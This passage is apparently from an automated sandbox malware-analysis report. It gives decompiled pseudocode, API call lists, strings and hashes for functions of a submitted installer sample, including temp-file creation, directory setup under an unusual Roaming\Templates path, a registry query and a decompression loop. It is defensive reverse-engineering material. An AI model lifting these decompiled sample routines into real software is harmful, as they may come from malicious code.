						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6E552618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E6E5515DD( *0x6e555068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6E552E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6E552B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6E552810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6e551817
0x6e551817
0x6e551817
0x6e551824
0x6e55182c
0x6e551839
0x6e551847
0x6e55184a
0x6e55184c
0x6e551851
0x6e551856
0x6e551978
0x6e551978
0x6e55185c
0x6e551860
0x6e551863
0x6e551868
0x6e551869
0x6e55186a
0x6e551870
0x6e551876
0x6e5518a6
0x6e5518ad
0x6e5518d1
0x6e55191e
0x6e55191f
0x6e5518d3
0x6e5518d3
0x6e5518d4
0x6e5518dd
0x6e5518de
0x6e5518e8
0x6e5518eb
0x6e5518f0
0x6e5518f7
0x6e5518f7
0x6e5518fd
0x6e5518fe
0x6e551904
0x6e55190a
0x6e551917
0x6e551918
0x6e55191b
0x6e5518af
0x6e5518af
0x6e5518b0
0x6e5518c5
0x6e5518c5
0x6e551929
0x6e55192c
0x6e551939
0x6e551940
0x6e551948
0x6e55194b
0x6e55194b
0x6e551948
0x6e551958
0x6e551960
0x6e551965
0x6e551958
0x6e55196d
0x00000000
0x6e55196f
0x00000000
0x6e551970
0x6e55196d
0x6e55187a
0x6e55187d
0x6e55189b
0x00000000
0x00000000
0x6e55189e
0x6e5518a3
0x6e5518a3
0x6e5518a5
0x00000000
0x6e5518a5
0x6e55187f
0x6e551880
0x6e551888
0x6e551889
0x00000000
0x6e551889
0x6e551882
0x6e551883
0x6e551891
0x00000000
0x6e551891
0x6e551886
0x00000000
0x00000000
0x00000000
0x6e551886

APIs

Part of subcall function 6E551BFF: GlobalFree.KERNEL32(?), ref: 6E551E74
Part of subcall function 6E551BFF: GlobalFree.KERNEL32(?), ref: 6E551E79
Part of subcall function 6E551BFF: GlobalFree.KERNEL32(?), ref: 6E551E7E

GlobalFree.KERNEL32(00000000), ref: 6E5518C5
FreeLibrary.KERNEL32(?), ref: 6E55194B
GlobalFree.KERNEL32(00000000), ref: 6E551970

Part of subcall function 6E55243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6E55246F

Part of subcall function 6E552810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E551896,00000000), ref: 6E5528E0

Part of subcall function 6E551666: wsprintfW.USER32 ref: 6E551694

Strings

, xrefs: 6E551951

Memory Dump Source

Source File: 00000000.00000002.1491224488.000000006E551000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E550000, based on PE: true

Associated: 00000000.00000002.1491166706.000000006E550000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491295904.000000006E554000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491349838.000000006E556000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e550000_xKBLVUHoY6.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 080d1f0b1363cd553c39021a5fa5770ec6cb1899e7efe039ba5eef7cec5e9520
Instruction ID: 4f3669bbbe6e2ba6216444b0da1595eeee27cc7c76b94d2da5f6400fd2cfd32e
Opcode Fuzzy Hash: 080d1f0b1363cd553c39021a5fa5770ec6cb1899e7efe039ba5eef7cec5e9520
Instruction Fuzzy Hash: 1141C371400B42DBDF509FE4CA84BE53BFCAF05314F044867EA159E286DB7494ACC760

Uniqueness

Uniqueness Score: -1.00%

Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406026(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040602c
0x00406032
0x00406033
0x00406033
0x00406038
0x00406039
0x0040603c
0x00406041
0x00406044
0x0040604e
0x0040605b
0x0040605f
0x00406067
0x00000000
0x00000000
0x0040606b
0x00000000
0x0040606d
0x0040606d
0x0040606d
0x00406070
0x00406073
0x00406073
0x00406076
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406044
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040602B
nsa, xrefs: 00406033

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405E81(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E03(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AB5( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AD2(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A38( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406507(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially\\Tygnings\\systemless",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,770F3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,770F3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless
API String ID: 1892508949-3312953533
Opcode ID: 1cd0b2e927c8f2ecfe34984a16faff9310db89cb10556e45c9539d2a776eb697
Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
Opcode Fuzzy Hash: 1cd0b2e927c8f2ecfe34984a16faff9310db89cb10556e45c9539d2a776eb697
Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D

Uniqueness

Uniqueness Score: -1.00%

Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004063D5(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E00406374(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x004063e3
0x004063e5
0x004063fd
0x00406402
0x00406407
0x00406445
0x00406445
0x00406409
0x0040641b
0x00406426
0x0040642c
0x00406437
0x00000000
0x00000000
0x00406437
0x0040644b

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040663C,80000002), ref: 0040641B
RegCloseKey.KERNELBASE(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll), ref: 00406426

Strings

Call, xrefs: 004063DC

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407033() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004074A1))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
